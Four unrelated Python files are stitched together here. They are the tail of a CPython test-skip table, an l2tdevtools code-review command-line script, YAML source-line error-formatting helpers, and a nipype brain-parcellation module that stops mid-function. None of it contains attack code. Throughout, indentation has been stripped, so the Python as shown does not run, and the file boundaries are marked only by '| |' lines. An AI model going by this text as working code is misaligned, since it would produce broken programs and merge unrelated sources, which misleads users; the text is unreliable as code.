test_sunaudiodev
test_sundry
""",
'openunix8':
"""
test_al
test_applesingle
test_bsddb
test_bsddb185
test_cd
test_cl
test_dl
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_minidom
test_nis
test_ntpath
test_openpty
test_pyexpat
test_sax
test_sunaudiodev
test_sundry
""",
'sco_sv3':
"""
test_al
test_applesingle
test_asynchat
test_bsddb
test_bsddb185
test_cd
test_cl
test_dl
test_fork1
test_gettext
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_minidom
test_nis
test_ntpath
test_openpty
test_pyexpat
test_queue
test_sax
test_sunaudiodev
test_sundry
test_thread
test_threaded_import
test_threadedtempfile
test_threading
""",
'riscos':
"""
test_al
test_applesingle
test_asynchat
test_atexit
test_bsddb
test_bsddb185
test_bsddb3
test_cd
test_cl
test_commands
test_crypt
test_dbm
test_dl
test_fcntl
test_fork1
test_gdbm
test_gl
test_grp
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_mmap
test_nis
test_ntpath
test_openpty
test_poll
test_popen2
test_pty
test_pwd
test_strop
test_sunaudiodev
test_sundry
test_thread
test_threaded_import
test_threadedtempfile
test_threading
test_timing
""",
'darwin':
"""
test__locale
test_al
test_bsddb
test_bsddb3
test_cd
test_cl
test_curses
test_dl
test_gdbm
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_minidom
test_nis
test_ntpath
test_ossaudiodev
test_poll
test_sunaudiodev
""",
'sunos5':
"""
test_al
test_applesingle
test_bsddb
test_bsddb185
test_cd
test_cl
test_curses
test_dbm
test_gdbm
test_gl
test_gzip
test_imgfile
test_linuxaudiodev
test_openpty
test_zipfile
test_zlib
""",
'hp-ux11':
"""
test_al
test_applesingle
test_bsddb
test_bsddb185
test_cd
test_cl
test_curses
test_dl
test_gdbm
test_gl
test_gzip
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_minidom
test_nis
test_ntpath
test_openpty
test_pyexpat
test_sax
test_sunaudiodev
test_zipfile
test_zlib
""",
'atheos':
"""
test_al
test_applesingle
test_bsddb185
test_cd
test_cl
test_curses
test_dl
test_gdbm
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_locale
test_mhlib
test_mmap
test_nis
test_poll
test_popen2
test_resource
test_sunaudiodev
""",
'cygwin':
"""
test_al
test_applesingle
test_bsddb185
test_bsddb3
test_cd
test_cl
test_curses
test_dbm
test_gl
test_imgfile
test_ioctl
test_largefile
test_linuxaudiodev
test_locale
test_nis
test_ossaudiodev
test_socketserver
test_sunaudiodev
""",
'os2emx':
"""
test_al
test_applesingle
test_audioop
test_bsddb185
test_bsddb3
test_cd
test_cl
test_commands
test_curses
test_dl
test_gl
test_imgfile
test_largefile
test_linuxaudiodev
test_mhlib
test_mmap
test_nis
test_openpty
test_ossaudiodev
test_pty
test_resource
test_signal
test_sunaudiodev
""",
'freebsd4':
"""
test_aepack
test_al
test_applesingle
test_bsddb
test_bsddb3
test_cd
test_cl
test_gdbm
test_gl
test_imgfile
test_linuxaudiodev
test_locale
test_macfs
test_macostools
test_nis
test_normalization
test_ossaudiodev
test_pep277
test_plistlib
test_pty
test_scriptpackages
test_socket_ssl
test_socketserver
test_sunaudiodev
test_tcl
test_timeout
test_unicode_file
test_urllibnet
test_winreg
test_winsound
""",
}
_expectations['freebsd5'] = _expectations['freebsd4']
_expectations['freebsd6'] = _expectations['freebsd4']
class _ExpectedSkips:
def __init__(self):
import os.path
from test import test_normalization
from test import test_socket_ssl
from test import test_timeout
from test import test_codecmaps_cn, test_codecmaps_jp
from test import test_codecmaps_kr, test_codecmaps_tw
from test import test_codecmaps_hk
self.valid = False
if sys.platform in _expectations:
s = _expectations[sys.platform]
self.expected = set(s.split())
if not os.path.supports_unicode_filenames:
self.expected.add('test_pep277')
if test_normalization.skip_expected:
self.expected.add('test_normalization')
if test_socket_ssl.skip_expected:
self.expected.add('test_socket_ssl')
if test_timeout.skip_expected:
self.expected.add('test_timeout')
for cc in ('cn', 'jp', 'kr', 'tw', 'hk'):
if eval('test_codecmaps_' + cc).skip_expected:
self.expected.add('test_codecmaps_' + cc)
if sys.maxint == 9223372036854775807L:
self.expected.add('test_rgbimg')
self.expected.add('test_imageop')
if not sys.platform in ("mac", "darwin"):
MAC_ONLY = ["test_macostools", "test_macfs", "test_aepack",
"test_plistlib", "test_scriptpackages"]
for skip in MAC_ONLY:
self.expected.add(skip)
if sys.platform != "win32":
WIN_ONLY = ["test_unicode_file", "test_winreg",
"test_winsound"]
for skip in WIN_ONLY:
self.expected.add(skip)
self.valid = True
def isvalid(self):
"Return true iff _ExpectedSkips knows about the current platform."
return self.valid
def getexpected(self):
"""Return set of test names we expect to skip on current platform.
self.isvalid() must be true.
"""
assert self.isvalid()
return self.expected
if __name__ == '__main__':
# Remove regrtest.py's own directory from the module search path. This
# prevents relative imports from working, and relative imports will screw
# up the testing framework. E.g. if both test.test_support and
# test_support are imported, they will not contain the same globals, and
# much of the testing framework relies on the globals in the
# test.test_support module.
mydir = os.path.abspath(os.path.normpath(os.path.dirname(sys.argv[0])))
i = pathlen = len(sys.path)
while i >= 0:
i -= 1
if os.path.abspath(os.path.normpath(sys.path[i])) == mydir:
del sys.path[i]
if len(sys.path) == pathlen:
print 'Could not find %r in sys.path to remove it' % mydir
main()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Script to manage code reviews."""
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import os
import sys
from l2tdevtools.review_helpers import review
def Main():
"""The main program function.
Returns:
bool: True if successful or False if not.
"""
argument_parser = argparse.ArgumentParser(
description='Script to manage code reviews.')
# yapf: disable
argument_parser.add_argument(
'--project-path', '--project_path', '-p', dest='project_path',
action='store', default=os.getcwd(), help=(
'Path to the project being reviewed.'))
argument_parser.add_argument(
'--allfiles', '--all-files', '--all_files', dest='all_files',
action='store_true', default=False, help=(
'Apply command to all files, currently only affects the lint '
'command.'))
argument_parser.add_argument(
'--diffbase', dest='diffbase', action='store', type=str,
metavar='DIFFBASE', default='upstream/master', help=(
'The diffbase the default is upstream/master. This options is used '
'to indicate to what "base" the code changes are relative to and '
'can be used to "chain" code reviews.'))
argument_parser.add_argument(
'--nobrowser', '--no-browser', '--no_browser', dest='no_browser',
action='store_true', default=False, help=(
'Disable the functionality to use the webbrowser to get the OAuth '
'token should be disabled.'))
argument_parser.add_argument(
'--noconfirm', '--no-confirm', '--no_confirm', dest='no_confirm',
action='store_true', default=False, help=(
'Do not ask for confirmation apply defaults.\n'
'WARNING: only use this when you are familiar with the defaults.'))
argument_parser.add_argument(
'--noedit', '--no-edit', '--no_edit', dest='no_edit', action='store_true',
default=False, help=(
'Do not allow edits from maintainers on the pull request.\n'
'Changing this can result in a more tedious code review.'))
argument_parser.add_argument(
'--offline', dest='offline', action='store_true', default=False, help=(
'The review script is running offline and any online check is '
'skipped.'))
help_message = 'Enable code style checking with yapf.'
argument_parser.add_argument(
'--enable-yapf', '--enable_yapf', dest='enable_yapf', action='store_true',
default=False, help=help_message)
commands_parser = argument_parser.add_subparsers(dest='command')
close_command_parser = commands_parser.add_parser('close')
# TODO: add this to help output.
close_command_parser.add_argument(
'branch', action='store', metavar='BRANCH', default=None,
help='name of the corresponding feature branch.')
commands_parser.add_parser('create-pr')
commands_parser.add_parser('create_pr')
merge_command_parser = commands_parser.add_parser('merge')
# TODO: add this to help output.
merge_command_parser.add_argument(
'github_origin', action='store',
metavar='GITHUB_ORIGIN', default=None,
help='the github origin to merged e.g. username:feature.')
merge_edit_command_parser = commands_parser.add_parser('merge-edit')
# TODO: add this to help output.
merge_edit_command_parser.add_argument(
'github_origin', action='store',
metavar='GITHUB_ORIGIN', default=None,
help='the github origin to merged e.g. username:feature.')
merge_edit_command_parser = commands_parser.add_parser('merge_edit')
# TODO: add this to help output.
merge_edit_command_parser.add_argument(
'github_origin', action='store',
metavar='GITHUB_ORIGIN', default=None,
help='the github origin to merged e.g. username:feature.')
commands_parser.add_parser('lint')
commands_parser.add_parser('lint-test')
commands_parser.add_parser('lint_test')
# yapf: enable
# TODO: add submit option?
commands_parser.add_parser('test')
# TODO: add dry-run option to run merge without commit.
# useful to test pending CLs.
commands_parser.add_parser('update-authors')
commands_parser.add_parser('update_authors')
commands_parser.add_parser('update-version')
commands_parser.add_parser('update_version')
options = argument_parser.parse_args()
feature_branch = None
github_origin = None
print_help_on_error = False
if options.command == 'close':
feature_branch = getattr(options, 'branch', None)
if not feature_branch:
print('Feature branch value is missing.')
print_help_on_error = True
# Support "username:branch" notation.
if ':' in feature_branch:
_, _, feature_branch = feature_branch.rpartition(':')
if options.command in ('merge', 'merge-edit', 'merge_edit'):
github_origin = getattr(options, 'github_origin', None)
if not github_origin:
print('Github origin value is missing.')
print_help_on_error = True
# yapf: disable
if options.offline and options.command not in (
'lint', 'lint-test', 'lint_test', 'test'):
print('Cannot run: {0:s} in offline mode.'.format(options.command))
print_help_on_error = True
# yapf: enable
if print_help_on_error:
print('')
argument_parser.print_help()
print('')
return False
home_path = os.path.expanduser('~')
netrc_path = os.path.join(home_path, '.netrc')
if not os.path.exists(netrc_path):
print('{0:s} aborted - unable to find .netrc.'.format(
options.command.title())) # yapf: disable
return False
review_helper = review.ReviewHelper(
options.command,
options.project_path,
github_origin,
feature_branch,
options.diffbase,
all_files=options.all_files,
no_browser=options.no_browser,
no_confirm=options.no_confirm,
no_edit=options.no_edit)
if not review_helper.InitializeHelpers():
return False
if not review_helper.CheckLocalGitState():
return False
if not options.offline and not review_helper.CheckRemoteGitState():
return False
if options.command == 'merge':
# TODO: merge disabled until re-implementation.
return False
if options.command in ('merge', 'merge-edit', 'merge_edit'):
if not review_helper.PullChangesFromFork():
return False
if not review_helper.Lint():
return False
if options.enable_yapf:
if not review_helper.CheckStyle():
return False
if not review_helper.Test():
return False
result = False
if options.command in ('create-pr', 'create_pr'):
result = review_helper.CreatePullRequest()
elif options.command == 'close':
result = review_helper.Close()
elif options.command in ('lint', 'lint-test', 'lint_test', 'test'):
result = True
elif options.command == 'merge':
# result = review_helper.Merge(pull_request_issue_number)
pass
elif options.command in ('update-authors', 'update_authors'):
result = review_helper.UpdateAuthors()
elif options.command in ('update-version', 'update_version'):
result = review_helper.UpdateVersion()
return result
if __name__ == '__main__':
if not Main():
sys.exit(1)
else:
sys.exit(0)
| |
import os
import re
from typing import (
Any,
AnyStr,
Callable,
Dict,
List,
MutableMapping,
MutableSequence,
Optional,
Tuple,
Union,
)
import ruamel.yaml
from ruamel.yaml.comments import CommentedBase, CommentedMap, CommentedSeq
lineno_re = re.compile("^(.*?:[0-9]+:[0-9]+: )(( *)(.*))")
def _add_lc_filename(r: ruamel.yaml.comments.CommentedBase, source: AnyStr) -> None:
if isinstance(r, ruamel.yaml.comments.CommentedBase):
r.lc.filename = source
if isinstance(r, MutableSequence):
for d in r:
_add_lc_filename(d, source)
elif isinstance(r, MutableMapping):
for d in r.values():
_add_lc_filename(d, source)
def relname(source: str) -> str:
if source.startswith("file://"):
source = source[7:]
source = os.path.relpath(source)
return source
def add_lc_filename(r: ruamel.yaml.comments.CommentedBase, source: str) -> None:
_add_lc_filename(r, relname(source))
def reflow_all(text: str, maxline: Optional[int] = None) -> str:
if maxline is None:
maxline = int(os.environ.get("COLUMNS", "100"))
maxno = 0
for line in text.splitlines():
g = lineno_re.match(line)
if not g:
continue
group = g.group(1)
assert group is not None # nosec
maxno = max(maxno, len(group))
maxno_text = maxline - maxno
msg = [] # type: List[str]
for line in text.splitlines():
g = lineno_re.match(line)
if not g:
msg.append(line)
continue
pre = g.group(1)
assert pre is not None # nosec
group2 = g.group(2)
assert group2 is not None # nosec
reflowed = reflow(group2, maxno_text, g.group(3)).splitlines()
msg.extend([pre.ljust(maxno, " ") + r for r in reflowed])
return "\n".join(msg)
def reflow(text: str, maxline: int, shift: Optional[str] = "") -> str:
if maxline < 20:
maxline = 20
if len(text) > maxline:
sp = text.rfind(" ", 0, maxline)
if sp < 1:
sp = text.find(" ", sp + 1)
if sp == -1:
sp = len(text)
if sp < len(text):
return "{}\n{}{}".format(
text[0:sp], shift, reflow(text[sp + 1 :], maxline, shift)
)
return text
def indent(v: str, nolead: bool = False, shift: str = " ", bullet: str = " ") -> str:
if nolead:
return v.splitlines()[0] + "\n".join(
[shift + line for line in v.splitlines()[1:]]
)
else:
def lineno(i: int, line: str) -> str:
r = lineno_re.match(line)
if r is not None:
group1 = r.group(1)
group2 = r.group(2)
assert group1 is not None # nosec
assert group2 is not None # nosec
return group1 + (bullet if i == 0 else shift) + group2
else:
return (bullet if i == 0 else shift) + line
return "\n".join([lineno(i, line) for i, line in enumerate(v.splitlines())])
def bullets(textlist: List[str], bul: str) -> str:
if len(textlist) == 1:
return textlist[0]
else:
return "\n".join(indent(t, bullet=bul) for t in textlist)
def strip_duplicated_lineno(text: str) -> str:
"""Same as `strip_dup_lineno` but without reflow"""
pre = None # type: Optional[str]
msg = []
for line in text.splitlines():
g = lineno_re.match(line)
if not g:
msg.append(line)
continue
elif g.group(1) != pre:
msg.append(line)
pre = g.group(1)
else:
group1 = g.group(1)
group2 = g.group(2)
assert group1 is not None # nosec
assert group2 is not None # nosec
msg.append(" " * len(group1) + group2)
return "\n".join(msg)
def strip_dup_lineno(text: str, maxline: Optional[int] = None) -> str:
if maxline is None:
maxline = int(os.environ.get("COLUMNS", "100"))
pre = None # type: Optional[str]
msg = []
maxno = 0
for line in text.splitlines():
g = lineno_re.match(line)
if not g:
continue
group1 = g.group(1)
assert group1 is not None # nosec
maxno = max(maxno, len(group1))
for line in text.splitlines():
g = lineno_re.match(line)
if not g:
msg.append(line)
continue
if g.group(1) != pre:
group3 = g.group(3)
assert group3 is not None # nosec
shift = maxno + len(group3)
group2 = g.group(2)
assert group2 is not None # nosec
g2 = reflow(group2, maxline - shift, " " * shift)
pre = g.group(1)
assert pre is not None # nosec
msg.append(pre + " " * (maxno - len(pre)) + g2)
else:
group2 = g.group(2)
assert group2 is not None # nosec
group3 = g.group(3)
assert group3 is not None # nosec
g2 = reflow(group2, maxline - maxno, " " * (maxno + len(group3)))
msg.append(" " * maxno + g2)
return "\n".join(msg)
def cmap(
d: Union[int, float, str, Dict[str, Any], List[Any], None],
lc: Optional[List[int]] = None,
fn: Optional[str] = None,
) -> Union[int, float, str, CommentedMap, CommentedSeq, None]:
if lc is None:
lc = [0, 0, 0, 0]
if fn is None:
fn = "test"
if isinstance(d, CommentedMap):
fn = d.lc.filename if hasattr(d.lc, "filename") else fn
for k, v in d.items():
if d.lc.data is not None and k in d.lc.data:
d[k] = cmap(v, lc=d.lc.data[k], fn=fn)
else:
d[k] = cmap(v, lc, fn=fn)
return d
if isinstance(d, CommentedSeq):
fn = d.lc.filename if hasattr(d.lc, "filename") else fn
for k2, v2 in enumerate(d):
if d.lc.data is not None and k2 in d.lc.data:
d[k2] = cmap(v2, lc=d.lc.data[k2], fn=fn)
else:
d[k2] = cmap(v2, lc, fn=fn)
return d
if isinstance(d, MutableMapping):
cm = CommentedMap()
for k in sorted(d.keys()):
v = d[k]
if isinstance(v, CommentedBase):
uselc = [v.lc.line, v.lc.col, v.lc.line, v.lc.col]
vfn = v.lc.filename if hasattr(v.lc, "filename") else fn
else:
uselc = lc
vfn = fn
cm[k] = cmap(v, lc=uselc, fn=vfn)
cm.lc.add_kv_line_col(k, uselc)
cm.lc.filename = fn
return cm
if isinstance(d, MutableSequence):
cs = CommentedSeq()
for k3, v3 in enumerate(d):
if isinstance(v3, CommentedBase):
uselc = [v3.lc.line, v3.lc.col, v3.lc.line, v3.lc.col]
vfn = v3.lc.filename if hasattr(v3.lc, "filename") else fn
else:
uselc = lc
vfn = fn
cs.append(cmap(v3, lc=uselc, fn=vfn))
cs.lc.add_kv_line_col(k3, uselc)
cs.lc.filename = fn
return cs
else:
return d
class SourceLine:
def __init__(
self,
item: Any,
key: Optional[Any] = None,
raise_type: Callable[[str], Any] = str,
include_traceback: bool = False,
) -> None:
self.item = item
self.key = key
self.raise_type = raise_type
self.include_traceback = include_traceback
def __enter__(self) -> "SourceLine":
return self
def __exit__(
self,
exc_type: Any,
exc_value: Any,
tb: Any,
) -> None:
if not exc_value:
return
raise self.makeError(str(exc_value)) from exc_value
def file(self) -> Optional[str]:
if hasattr(self.item, "lc") and hasattr(self.item.lc, "filename"):
return str(self.item.lc.filename)
else:
return None
def start(self) -> Optional[Tuple[int, int]]:
if self.file() is None:
return None
elif (
self.key is None
or self.item.lc.data is None
or self.key not in self.item.lc.data
):
return ((self.item.lc.line or 0) + 1, (self.item.lc.col or 0) + 1)
else:
return (
(self.item.lc.data[self.key][0] or 0) + 1,
(self.item.lc.data[self.key][1] or 0) + 1,
)
def end(self) -> Optional[Tuple[int, int]]:
return None
def makeLead(self) -> str:
if self.file():
lcol = self.start()
line, col = lcol if lcol else ("", "")
return f"{self.file()}:{line}:{col}:"
else:
return ""
def makeError(self, msg: str) -> Any:
if not isinstance(self.item, ruamel.yaml.comments.CommentedBase):
return self.raise_type(msg)
errs = []
lead = self.makeLead()
for m in msg.splitlines():
if bool(lineno_re.match(m)):
errs.append(m)
else:
errs.append(f"{lead} {m}")
return self.raise_type("\n".join(errs))
| |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Change directory to provide relative paths for doctests
>>> import os
>>> filepath = os.path.dirname( os.path.realpath( __file__ ) )
>>> datadir = os.path.realpath(os.path.join(filepath, '../../testing/data'))
>>> os.chdir(datadir)
"""
from nipype.interfaces.base import (
BaseInterface, BaseInterfaceInputSpec, traits,
File, TraitedSpec, Directory, isdefined)
import os
import os.path as op
import numpy as np
import nibabel as nb
import networkx as nx
import shutil
from nipype.utils.misc import package_check
import warnings
from ... import logging
iflogger = logging.getLogger('interface')
have_cmp = True
try:
package_check('cmp')
except Exception, e:
have_cmp = False
else:
import cmp
from cmp.util import runCmd
def create_annot_label(subject_id, subjects_dir, fs_dir, parcellation_name):
iflogger.info("Create the cortical labels necessary for our ROIs")
iflogger.info("=================================================")
fs_label_dir = op.join(op.join(subjects_dir, subject_id), 'label')
output_dir = op.abspath(op.curdir)
paths = []
cmp_config = cmp.configuration.PipelineConfiguration()
cmp_config.parcellation_scheme = "Lausanne2008"
for hemi in ['lh', 'rh']:
spath = cmp_config._get_lausanne_parcellation(
'Lausanne2008')[parcellation_name]['fs_label_subdir_name'] % hemi
paths.append(spath)
for p in paths:
try:
os.makedirs(op.join('.', p))
except:
pass
if '33' in parcellation_name:
comp = [
('rh', 'myatlas_36_rh.gcs', 'rh.myaparc_36.annot',
'regenerated_rh_36', 'myaparc_36'),
('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
'regenerated_rh_60', 'myaparc_60'),
('lh', 'myatlas_36_lh.gcs', 'lh.myaparc_36.annot',
'regenerated_lh_36', 'myaparc_36'),
('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
'regenerated_lh_60', 'myaparc_60'),
]
elif '60' in parcellation_name:
comp = [
('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
'regenerated_rh_60', 'myaparc_60'),
('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
'regenerated_lh_60', 'myaparc_60'),
]
elif '125' in parcellation_name:
comp = [
('rh', 'myatlas_125_rh.gcs', 'rh.myaparc_125.annot',
'regenerated_rh_125', 'myaparc_125'),
('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
'regenerated_rh_60', 'myaparc_60'),
('lh', 'myatlas_125_lh.gcs', 'lh.myaparc_125.annot',
'regenerated_lh_125', 'myaparc_125'),
('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
'regenerated_lh_60', 'myaparc_60'),
]
elif '250' in parcellation_name:
comp = [
('rh', 'myatlas_250_rh.gcs', 'rh.myaparc_250.annot',
'regenerated_rh_250', 'myaparc_250'),
('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
'regenerated_rh_60', 'myaparc_60'),
('lh', 'myatlas_250_lh.gcs', 'lh.myaparc_250.annot',
'regenerated_lh_250', 'myaparc_250'),
('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
'regenerated_lh_60', 'myaparc_60'),
]
else:
comp = [
('rh', 'myatlas_36_rh.gcs', 'rh.myaparc_36.annot',
'regenerated_rh_36', 'myaparc_36'),
('rh', 'myatlasP1_16_rh.gcs', 'rh.myaparcP1_16.annot',
'regenerated_rh_500', 'myaparcP1_16'),
('rh', 'myatlasP17_28_rh.gcs', 'rh.myaparcP17_28.annot',
'regenerated_rh_500', 'myaparcP17_28'),
('rh', 'myatlasP29_36_rh.gcs', 'rh.myaparcP29_36.annot',
'regenerated_rh_500', 'myaparcP29_36'),
('rh', 'myatlas_60_rh.gcs', 'rh.myaparc_60.annot',
'regenerated_rh_60', 'myaparc_60'),
('rh', 'myatlas_125_rh.gcs', 'rh.myaparc_125.annot',
'regenerated_rh_125', 'myaparc_125'),
('rh', 'myatlas_250_rh.gcs', 'rh.myaparc_250.annot',
'regenerated_rh_250', 'myaparc_250'),
('lh', 'myatlas_36_lh.gcs', 'lh.myaparc_36.annot',
'regenerated_lh_36', 'myaparc_36'),
('lh', 'myatlasP1_16_lh.gcs', 'lh.myaparcP1_16.annot',
'regenerated_lh_500', 'myaparcP1_16'),
('lh', 'myatlasP17_28_lh.gcs', 'lh.myaparcP17_28.annot',
'regenerated_lh_500', 'myaparcP17_28'),
('lh', 'myatlasP29_36_lh.gcs', 'lh.myaparcP29_36.annot',
'regenerated_lh_500', 'myaparcP29_36'),
('lh', 'myatlas_60_lh.gcs', 'lh.myaparc_60.annot',
'regenerated_lh_60', 'myaparc_60'),
('lh', 'myatlas_125_lh.gcs', 'lh.myaparc_125.annot',
'regenerated_lh_125', 'myaparc_125'),
('lh', 'myatlas_250_lh.gcs', 'lh.myaparc_250.annot',
'regenerated_lh_250', 'myaparc_250'),
]
log = cmp_config.get_logger()
for out in comp:
mris_cmd = 'mris_ca_label %s %s "%s/surf/%s.sphere.reg" "%s" "%s" ' % (subject_id, out[0],
op.join(subjects_dir, subject_id), out[0], cmp_config.get_lausanne_atlas(out[1]), op.join(fs_label_dir, out[2]))
runCmd(mris_cmd, log)
iflogger.info('-----------')
annot = '--annotation "%s"' % out[4]
mri_an_cmd = 'mri_annotation2label --subject %s --hemi %s --outdir "%s" %s' % (subject_id, out[0], op.join(output_dir, out[3]), annot)
iflogger.info(mri_an_cmd)
runCmd(mri_an_cmd, log)
iflogger.info('-----------')
iflogger.info(os.environ['SUBJECTS_DIR'])
# extract cc and unknown to add to tractography mask, we do not want this as a region of interest
# in FS 5.0, unknown and corpuscallosum are not available for the 35 scale (why?),
# but for the other scales only, take the ones from _60
rhun = op.join(output_dir, 'rh.unknown.label')
lhun = op.join(output_dir, 'lh.unknown.label')
rhco = op.join(output_dir, 'rh.corpuscallosum.label')
lhco = op.join(output_dir, 'lh.corpuscallosum.label')
shutil.copy(
op.join(output_dir, 'regenerated_rh_60', 'rh.unknown.label'), rhun)
shutil.copy(
op.join(output_dir, 'regenerated_lh_60', 'lh.unknown.label'), lhun)
shutil.copy(op.join(
output_dir, 'regenerated_rh_60', 'rh.corpuscallosum.label'), rhco)
shutil.copy(op.join(
output_dir, 'regenerated_lh_60', 'lh.corpuscallosum.label'), lhco)
mri_cmd = """mri_label2vol --label "%s" --label "%s" --label "%s" --label "%s" --temp "%s" --o "%s" --identity """ % (rhun, lhun, rhco, lhco, op.join(op.join(subjects_dir, subject_id), 'mri', 'orig.mgz'), op.join(fs_label_dir, 'cc_unknown.nii.gz') )
runCmd(mri_cmd, log)
runCmd('mris_volmask %s' % subject_id, log)
mri_cmd = 'mri_convert -i "%s/mri/ribbon.mgz" -o "%s/mri/ribbon.nii.gz"' % (op.join(subjects_dir, subject_id), op.join(subjects_dir, subject_id))
runCmd(mri_cmd, log)
mri_cmd = 'mri_convert -i "%s/mri/aseg.mgz" -o "%s/mri/aseg.nii.gz"' % (
op.join(subjects_dir, subject_id), op.join(subjects_dir, subject_id))
runCmd(mri_cmd, log)
iflogger.info("[ DONE ]")
def create_roi(subject_id, subjects_dir, fs_dir, parcellation_name, dilation):
""" Creates the ROI_%s.nii.gz files using the given parcellation information
from networks. Iteratively create volume. """
iflogger.info("Create the ROIs:")
output_dir = op.abspath(op.curdir)
fs_dir = op.join(subjects_dir, subject_id)
cmp_config = cmp.configuration.PipelineConfiguration()
cmp_config.parcellation_scheme = "Lausanne2008"
log = cmp_config.get_logger()
parval = cmp_config._get_lausanne_parcellation(
'Lausanne2008')[parcellation_name]
pgpath = parval['node_information_graphml']
aseg = nb.load(op.join(fs_dir, 'mri', 'aseg.nii.gz'))
asegd = aseg.get_data()
# identify cortical voxels, right (3) and left (42) hemispheres
idxr = np.where(asegd == 3)
idxl = np.where(asegd == 42)
xx = np.concatenate((idxr[0], idxl[0]))
yy = np.concatenate((idxr[1], idxl[1]))
zz = np.concatenate((idxr[2], idxl[2]))
# initialize variables necessary for cortical ROIs dilation
# dimensions of the neighbourhood for rois labels assignment (choose odd dimensions!)
shape = (25, 25, 25)
center = np.array(shape) // 2
# dist: distances from the center of the neighbourhood
dist = np.zeros(shape, dtype='float32')
for x in range(shape[0]):
for y in range(shape[1]):
for z in range(shape[2]):
distxyz = center - [x, y, z]
dist[x, y, z] = np.sqrt(np.sum(np.multiply(distxyz, distxyz)))
iflogger.info("Working on parcellation: ")
iflogger.info(cmp_config._get_lausanne_parcellation(
'Lausanne2008')[parcellation_name])
iflogger.info("========================")
pg = nx.read_graphml(pgpath)
# each node represents a brain region
# create a big 256^3 volume for storage of all ROIs
rois = np.zeros((256, 256, 256), dtype=np.int16)
count = 0
for brk, brv in pg.nodes_iter(data=True):
count = count + 1
iflogger.info(brv)
iflogger.info(brk)
if brv['dn_hemisphere'] == 'left':
hemi = 'lh'
elif brv['dn_hemisphere'] == 'right':
hemi = 'rh'
if brv['dn_region'] == 'subcortical':
iflogger.info(brv)
iflogger.info("---------------------")
iflogger.info("Work on brain region: %s" % (brv['dn_region']))
iflogger.info("Freesurfer Name: %s" % brv['dn_fsname'])
iflogger.info("Region %s of %s " % (count, pg.number_of_nodes()))
iflogger.info("---------------------")
# if it is subcortical, retrieve roi from aseg
idx = np.where(asegd == int(brv['dn_fs_aseg_val']))
rois[idx] = int(brv['dn_correspondence_id'])
elif brv['dn_region'] == 'cortical':
iflogger.info(brv)
iflogger.info("---------------------")
iflogger.info("Work on brain region: %s" % (brv['dn_region']))
iflogger.info("Freesurfer Name: %s" % brv['dn_fsname'])
iflogger.info("Region %s of %s " % (count, pg.number_of_nodes()))
iflogger.info("---------------------")
labelpath = op.join(
output_dir, parval['fs_label_subdir_name'] % hemi)
# construct .label file name
fname = '%s.%s.label' % (hemi, brv['dn_fsname'])
# execute fs mri_label2vol to generate volume roi from the label file
# store it in temporary file to be overwritten for each region
mri_cmd = 'mri_label2vol --label "%s" --temp "%s" --o "%s" --identity' % (op.join(labelpath, fname),
op.join(fs_dir, 'mri', 'orig.mgz'), op.join(output_dir, 'tmp.nii.gz'))
runCmd(mri_cmd, log)
tmp = nb.load(op.join(output_dir, 'tmp.nii.gz'))
tmpd = tmp.get_data()
# find voxel and set them to intensityvalue in rois
idx = np.where(tmpd == 1)
rois[idx] = int(brv['dn_correspondence_id'])
# store volume eg in ROI_scale33.nii.gz
out_roi = op.abspath('ROI_%s.nii.gz' % parcellation_name)
# update the header
hdr = aseg.get_header()
hdr2 = hdr.copy()
hdr2.set_data_dtype(np.uint16)
log.info("Save output image to %s" % out_roi)
img = nb.Nifti1Image(rois, aseg.get_affine(), hdr2)
nb.save(img, out_roi)
iflogger.info("[ DONE ]")
# dilate cortical regions
if (dilation == True):
iflogger.info("Dilating cortical regions...")
# loop throughout all the voxels belonging to the aseg GM volume
for j in range(xx.size):
if rois[xx[j], yy[j], zz[j]] == 0:
local = extract(
rois, shape, position=(xx[j], yy[j], zz[j]), fill=0)
mask = local.copy()
mask[np.nonzero(local > 0)] = 1
thisdist = np.multiply(dist, mask)
thisdist[np.nonzero(thisdist == 0)] = np.amax(thisdist)
value = np.int_(
local[np.nonzero(thisdist == np.amin(thisdist))])
if value.size > 1:
counts = np.bincount(value)
value = np.argmax(counts)
rois[xx[j], yy[j], zz[j]] = value
# store volume eg in ROIv_scale33.nii.gz
out_roi = op.abspath('ROIv_%s.nii.gz' % parcellation_name)
iflogger.info("Save output image to %s" % out_roi)
img = nb.Nifti1Image(rois, aseg.get_affine(), hdr2)
nb.save(img, out_roi)
iflogger.info("[ DONE ]")
def create_wm_mask(subject_id, subjects_dir, fs_dir, parcellation_name):
iflogger.info("Create white matter mask")
fs_dir = op.join(subjects_dir, subject_id)
cmp_config = cmp.configuration.PipelineConfiguration()
cmp_config.parcellation_scheme = "Lausanne2008"
pgpath = cmp_config._get_lausanne_parcellation(
'Lausanne2008')[parcellation_name]['node_information_graphml']
# load ribbon as basis for white matter mask
fsmask = nb.load(op.join(fs_dir, 'mri', 'ribbon.nii.gz'))
fsmaskd = fsmask.get_data()
wmmask = np.zeros(fsmaskd.shape)
# extract right and left white matter
idx_lh = np.where(fsmaskd == 120)
idx_rh = np.where(fsmaskd == 20)
wmmask[idx_lh] = 1
wmmask[idx_rh] = 1
# remove subcortical nuclei from white matter mask
aseg = nb.load(op.join(fs_dir, 'mri', 'aseg.nii.gz'))
asegd = aseg.get_data()
try:
import scipy.ndimage.morphology as nd
except ImportError:
raise Exception('Need scipy for binary erosion of white matter mask')
# need binary erosion function
imerode = nd.binary_erosion
# ventricle erosion
csfA = np.zeros(asegd.shape)
csfB = np.zeros(asegd.shape)
